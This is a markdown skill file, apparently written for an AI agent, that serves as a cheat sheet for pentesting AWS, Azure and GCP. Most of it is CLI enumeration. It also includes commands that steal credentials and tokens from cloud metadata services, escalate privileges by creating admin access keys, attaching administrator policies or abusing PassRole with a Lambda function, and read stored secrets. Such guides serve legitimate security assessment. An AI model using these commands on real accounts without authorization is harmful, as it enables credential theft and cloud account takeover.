zhongwei/gh-trilwu-secskills-secskills
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
master
gh-trilwu-secskills-secskills/skills/cloud-security/SKILL.md
Zhongwei Li 33a29e697a Initial commit
2025-11-30 09:03:09 +08:00

527 lines
11 KiB
Markdown
Raw Permalink Blame History

---
name: exploiting-cloud-platforms
description: Exploit AWS, Azure, and GCP cloud misconfigurations including S3 buckets, IAM roles, metadata services, serverless functions, and cloud-specific privilege escalation. Use when pentesting cloud environments or assessing cloud security.
---
# Exploiting Cloud Platforms
## When to Use
- AWS, Azure, or GCP security assessment
- Cloud misconfiguration exploitation
- S3/Blob/Storage bucket hunting
- Cloud IAM privilege escalation
- Serverless function exploitation
- Cloud metadata service abuse
## AWS Security
### AWS CLI Setup
```bash
# Configure credentials
aws configure
# Or export directly
export AWS_ACCESS_KEY_ID=AKIAIOSFODNN7EXAMPLE
export AWS_SECRET_ACCESS_KEY=wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY
export AWS_DEFAULT_REGION=us-east-1
# Test credentials
aws sts get-caller-identity
# List available regions
aws ec2 describe-regions
```
### S3 Bucket Enumeration
```bash
# List buckets
aws s3 ls
# List bucket contents
aws s3 ls s3://bucket-name/
aws s3 ls s3://bucket-name/ --recursive
# Download bucket contents
aws s3 sync s3://bucket-name/ ./local-folder/
# Check public access
aws s3api get-bucket-acl --bucket bucket-name
aws s3api get-bucket-policy --bucket bucket-name
# Test unauthenticated access
aws s3 ls s3://bucket-name/ --no-sign-request
curl https://bucket-name.s3.amazonaws.com/
```
**S3 Bucket Discovery:**
```bash
# Common naming patterns
company-backup
company-data
company-dev
company-prod
company-logs
company-assets
# Tools
# s3scanner
python3 s3scanner.py buckets.txt
# S3 Inspector
python3 s3inspector.py --bucket-file buckets.txt
```
### IAM Enumeration
```bash
# Current user info
aws sts get-caller-identity
# List IAM users (if allowed)
aws iam list-users
# List user policies
aws iam list-attached-user-policies --user-name username
aws iam list-user-policies --user-name username
# Get policy details
aws iam get-policy --policy-arn arn:aws:iam::aws:policy/PolicyName
aws iam get-policy-version --policy-arn arn --version-id v1
# List roles
aws iam list-roles
# List groups
aws iam list-groups
```
### EC2 Enumeration
```bash
# List instances
aws ec2 describe-instances
# Get instance metadata (from instance)
curl http://169.254.169.254/latest/meta-data/
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/role-name
# List security groups
aws ec2 describe-security-groups
# List key pairs
aws ec2 describe-key-pairs
# List snapshots
aws ec2 describe-snapshots --owner-ids self
# Public snapshots by account
aws ec2 describe-snapshots --owner-ids 123456789012 --restorable-by-user-ids all
```
### Lambda Functions
```bash
# List functions
aws lambda list-functions
# Get function code
aws lambda get-function --function-name function-name
# Invoke function
aws lambda invoke --function-name function-name output.txt
# Get function configuration
aws lambda get-function-configuration --function-name function-name
```
### RDS Enumeration
```bash
# List DB instances
aws rds describe-db-instances
# List DB snapshots
aws rds describe-db-snapshots
# Check if publicly accessible
aws rds describe-db-instances --query 'DBInstances[*].[DBInstanceIdentifier,PubliclyAccessible]'
```
### Secrets Manager
```bash
# List secrets
aws secretsmanager list-secrets
# Get secret value
aws secretsmanager get-secret-value --secret-id secret-name
```
### CloudTrail (Logging)
```bash
# Check if CloudTrail is enabled
aws cloudtrail describe-trails
# Check trail status
aws cloudtrail get-trail-status --name trail-name
# Get recent events
aws cloudtrail lookup-events
```
### AWS Privilege Escalation
**Common Misconfigurations:**
```bash
# iam:CreatePolicyVersion - modify existing policies
# iam:SetDefaultPolicyVersion - set older policy version
# iam:PassRole + lambda:CreateFunction - execute code as role
# iam:AttachUserPolicy - attach admin policy to self
# iam:PutUserPolicy - add inline policy to self
# iam:CreateAccessKey - create keys for other users
# iam:UpdateAssumeRolePolicy - modify trust relationships
```
**Exploitation Examples:**
```bash
# Create access key for admin user (if iam:CreateAccessKey)
aws iam create-access-key --user-name admin-user
# Attach admin policy (if iam:AttachUserPolicy)
aws iam attach-user-policy --user-name current-user --policy-arn arn:aws:iam::aws:policy/AdministratorAccess
# PassRole + Lambda
aws lambda create-function --function-name evil --runtime python3.9 --role arn:aws:iam::ACCOUNT:role/AdminRole --handler lambda_function.lambda_handler --zip-file fileb://function.zip
aws lambda invoke --function-name evil output.txt
```
## Azure Security
### Azure CLI Setup
```bash
# Login
az login
# Login with service principal
az login --service-principal -u APP_ID -p PASSWORD --tenant TENANT_ID
# Get current account
az account show
# List subscriptions
az account list
```
### Blob Storage Enumeration
```bash
# List storage accounts
az storage account list
# List containers
az storage container list --account-name accountname
# List blobs
az storage blob list --container-name containername --account-name accountname
# Download blob
az storage blob download --container-name containername --name filename --account-name accountname
# Check public access
az storage container show --name containername --account-name accountname
# Test unauthenticated access
curl https://accountname.blob.core.windows.net/container/file
```
**Blob Discovery:**
```bash
# Common patterns
companyname
companyname-backup
companyname-data
companyname-files
# MicroBurst (PowerShell)
Invoke-EnumerateAzureBlobs -Base company
```
### VM Enumeration
```bash
# List VMs
az vm list
# List VM images
az vm image list
# Get VM details
az vm show --resource-group RG --name VMname
# List NICs
az network nic list
# List public IPs
az network public-ip list
```
### Azure AD Enumeration
```bash
# List users
az ad user list
# Get current user
az ad signed-in-user show
# List groups
az ad group list
# List service principals
az ad sp list
# List applications
az ad app list
```
### Function Apps
```bash
# List function apps
az functionapp list
# Get function app details
az functionapp show --name functionappname --resource-group RG
# List functions
az functionapp function list --name functionappname --resource-group RG
# Download function code
az functionapp deployment source config-zip --name functionappname --resource-group RG
```
### Key Vault
```bash
# List key vaults
az keyvault list
# List secrets
az keyvault secret list --vault-name vaultname
# Get secret
az keyvault secret show --name secretname --vault-name vaultname
```
### Azure Metadata Service
```bash
# From Azure VM
curl -H Metadata:true "http://169.254.169.254/metadata/instance?api-version=2021-02-01"
# Get access token
curl -H Metadata:true "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/"
```
## GCP Security
### gcloud Setup
```bash
# Login
gcloud auth login
# Login with service account
gcloud auth activate-service-account --key-file=key.json
# Get current account
gcloud config list
# List projects
gcloud projects list
```
### Storage Bucket Enumeration
```bash
# List buckets
gsutil ls
# List bucket contents
gsutil ls gs://bucket-name/
# Download files
gsutil cp gs://bucket-name/file.txt ./
# Check bucket permissions
gsutil iam get gs://bucket-name/
# Test unauthenticated access
curl https://storage.googleapis.com/bucket-name/file.txt
```
**Bucket Discovery:**
```bash
# Common patterns
company-backup
company-data
company_backup
company_data
# GCPBucketBrute
python3 gcpbucketbrute.py -k company
```
### Compute Engine
```bash
# List instances
gcloud compute instances list
# Get instance details
gcloud compute instances describe instance-name --zone=zone
# List disks
gcloud compute disks list
# List snapshots
gcloud compute snapshots list
# List firewall rules
gcloud compute firewall-rules list
```
### IAM Enumeration
```bash
# List service accounts
gcloud iam service-accounts list
# Get IAM policy
gcloud projects get-iam-policy PROJECT_ID
# List roles
gcloud iam roles list
# Describe role
gcloud iam roles describe roles/editor
```
### Cloud Functions
```bash
# List functions
gcloud functions list
# Describe function
gcloud functions describe function-name --region=region
# Download source code (if accessible)
gcloud functions describe function-name --region=region --format="value(sourceArchiveUrl)"
```
### GCP Metadata Service
```bash
# From GCP VM
curl "http://metadata.google.internal/computeMetadata/v1/?recursive=true" -H "Metadata-Flavor: Google"
# Get access token
curl "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token" -H "Metadata-Flavor: Google"
# Get service account email
curl "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/email" -H "Metadata-Flavor: Google"
```
## Cloud Exploitation Tools
**AWS:**
```bash
# Pacu - AWS exploitation framework
python3 pacu.py
# ScoutSuite - Security auditing
python3 scout.py aws
# Prowler - Security assessment
./prowler -M csv
# WeirdAAL - AWS attack library
python3 weirdAAL.py
```
**Azure:**
```bash
# MicroBurst - PowerShell toolkit
Import-Module MicroBurst.psm1
Invoke-EnumerateAzureBlobs
Invoke-EnumerateAzureSubDomains
# ScoutSuite
python3 scout.py azure
# ROADtools - Azure AD
roadrecon auth
roadrecon gather
roadrecon gui
```
**GCP:**
```bash
# ScoutSuite
python3 scout.py gcp
# GCP-IAM-Privilege-Escalation
# Check for privilege escalation paths
```
## Quick Cloud Wins
**AWS:**
- Public S3 buckets with sensitive data
- Overly permissive IAM policies
- Unencrypted snapshots
- Public RDS instances
- Lambda functions with secrets in environment variables
- EC2 metadata service abuse (SSRF)
**Azure:**
- Public blob storage containers
- Overly permissive RBAC
- Exposed Key Vault secrets
- Public-facing VMs with weak credentials
- Function apps with hardcoded secrets
**GCP:**
- Public storage buckets
- Overly permissive IAM bindings
- Public compute instances
- Service account key exposure
- Cloud Functions with secrets in code
## Common Cloud Misconfigurations
1. **Public Storage** - S3/Blob/GCS buckets with public read/write
2. **Excessive Permissions** - Overly permissive IAM/RBAC policies
3. **Exposed Secrets** - Keys/passwords in code, environment variables
4. **No MFA** - Critical accounts without multi-factor authentication
5. **Open Security Groups** - 0.0.0.0/0 access on sensitive ports
6. **Unencrypted Data** - Storage/databases without encryption
7. **Default Credentials** - Services using default passwords
8. **Exposed Metadata** - SSRF to cloud metadata services
9. **Public Snapshots** - EBS/disk snapshots publicly accessible
10. **CloudTrail Disabled** - No logging of API calls
## References
- https://book.hacktricks.xyz/pentesting-web/buckets
- https://github.com/RhinoSecurityLabs/pacu
- https://github.com/NetSPI/MicroBurst
- https://github.com/nccgroup/ScoutSuite
- https://cloudsecdocs.com/
Reference in New Issue View Git Blame Copy Permalink